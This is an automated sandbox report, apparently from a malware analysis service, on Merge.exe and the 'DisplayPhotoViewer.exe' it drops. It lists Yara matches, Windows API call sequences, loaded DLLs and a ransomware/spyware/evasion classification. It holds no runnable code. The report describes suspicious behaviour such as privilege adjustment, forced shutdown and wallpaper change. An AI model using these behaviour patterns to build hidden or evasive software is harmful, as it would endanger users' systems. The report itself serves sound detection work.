                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b0e0cd9.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.ab11758.14.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.b2f7769.27.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.111abb38.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.af365a1.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.af365a1.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.3.DisplayPhotoViewer.exe.af32b80.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.DisplayPhotoViewer.exe.11000000.10.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: DisplayPhotoViewer.exe PID: 7172, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1110DC60 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_1110DC60

                                System Summary

                                barindex
                                PE file has a writeable .text section
                                Source: RwcTouch.dll.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                PE file has nameless sections
                                Source: bass.dll.0.drStatic PE information: section name:
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1110DB00: GetModuleFileNameA,GetShortPathNameA,CreateFileA,CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,6_2_1110DB00
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_111533D0 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,6_2_111533D0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1102BC80 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102BC80
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100458006_2_10045800
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004B8106_2_1004B810
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004E4206_2_1004E420
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100760306_2_10076030
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1006C8406_2_1006C840
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100428506_2_10042850
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004C8806_2_1004C880
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004E0906_2_1004E090
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10049CB06_2_10049CB0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004C0C06_2_1004C0C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100728C06_2_100728C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004DCE06_2_1004DCE0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004D8F06_2_1004D8F0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100401006_2_10040100
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_101045306_2_10104530
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100759206_2_10075920
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004D5306_2_1004D530
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004C5406_2_1004C540
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10045D506_2_10045D50
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004D1706_2_1004D170
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10074D706_2_10074D70
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100479906_2_10047990
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004A5B06_2_1004A5B0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004CDD06_2_1004CDD0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100489F06_2_100489F0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100466106_2_10046610
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10047E306_2_10047E30
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004BE306_2_1004BE30
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100756606_2_10075660
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004F6806_2_1004F680
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100742806_2_10074280
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10071A906_2_10071A90
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004AEA06_2_1004AEA0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100692C06_2_100692C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004BAE06_2_1004BAE0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004C3006_2_1004C300
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10073F106_2_10073F10
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1004CB306_2_1004CB30
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100087406_2_10008740
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100477606_2_10047760
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100447706_2_10044770
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100493706_2_10049370
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_100413806_2_10041380
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1006C3906_2_1006C390
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10041FA06_2_10041FA0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1006B3D06_2_1006B3D0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_10047BE06_2_10047BE0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_107021306_2_10702130
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1070698F6_2_1070698F
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_107036C06_2_107036C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1105DDB06_2_1105DDB0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110280906_2_11028090
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1106EC606_2_1106EC60
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110833A06_2_110833A0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110315706_2_11031570
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1101B5806_2_1101B580
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1106B9D06_2_1106B9D0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1107BB506_2_1107BB50
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11043B906_2_11043B90
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1111DA206_2_1111DA20
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: String function: 11027F50 appears 496 times
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: String function: 110265F0 appears 31 times
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: String function: 1113C600 appears 314 times
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: String function: 11059E50 appears 151 times
                                Source: DisplayPhotoViewer.exe.0.drStatic PE information: Number of sections : 11 > 10
                                Source: Merge.exe, 00000000.00000002.2574316592.0000000003950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSecondaryDisplayPhotoViewer.exe^ vs Merge.exe
                                Source: Merge.exe, 00000000.00000003.2544634565.0000000003951000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamezxing.dll4 vs Merge.exe
                                Source: Merge.exe, 00000000.00000003.2541707986.0000000003951000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRwcTouch.dll> vs Merge.exe
                                Source: Merge.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: bass.dll.0.drStatic PE information: Section: ZLIB complexity 0.9999206046747967
                                Source: classification engineClassification label: mal42.rans.spyw.evad.winEXE@3/44@2/2
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11055D80 GetLastError,FormatMessageA,LocalFree,6_2_11055D80
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_11098130 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_11098130
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110981C0 AdjustTokenPrivileges,CloseHandle,6_2_110981C0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1110DF20 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,6_2_1110DF20
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_110C79F0 IsWindow,IsWindowVisible,SetForegroundWindow,FindResourceExA,LoadResource,LockResource,DialogBoxIndirectParamA,DialogBoxParamA,6_2_110C79F0
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeCode function: 6_2_1111FF80 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,6_2_1111FF80
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\ProgramsJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeMutant created: NULL
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeMutant created: \Sessions\1\BaseNamedObjects\58849237
                                Source: C:\Users\user\Desktop\Merge.exeFile created: C:\Users\user\AppData\Local\Temp\s5sg.0Jump to behavior
                                Source: Merge.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: Merge.exeVirustotal: Detection: 19%
                                Source: Merge.exeReversingLabs: Detection: 15%
                                Source: unknownProcess created: C:\Users\user\Desktop\Merge.exe "C:\Users\user\Desktop\Merge.exe"
                                Source: C:\Users\user\Desktop\Merge.exeProcess created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
                                Source: C:\Users\user\Desktop\Merge.exeProcess created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: quserex.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Users\user\Desktop\Merge.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winsta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: filesystemdialogs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: jencrypt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: opengl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: glu32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: freeimage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: olepro32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mediainfo.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dwmapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: compstui.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: bassmix.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windowscodecs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: security.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dinput8.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: xinput1_4.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: inputhost.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: appxdeploymentclient.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: zxing.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: quserex.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: rwctouch.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: d2d1.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dwrite.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msimg32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: idndl.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: bass.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msacm32.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: winmmbase.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: msftedit.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: windows.globalization.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: bcp47mrm.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: globinputhost.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dataexchange.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: d3d11.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dcomp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: dxgi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: twinapi.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wmp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: gnsdk_fp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wmvcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mfperfhelper.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wmasf.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: wmploc.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mmdevapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: mfplat.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: rtworkq.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: audioses.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exeSection loaded: umpdc.dllJump to behavior
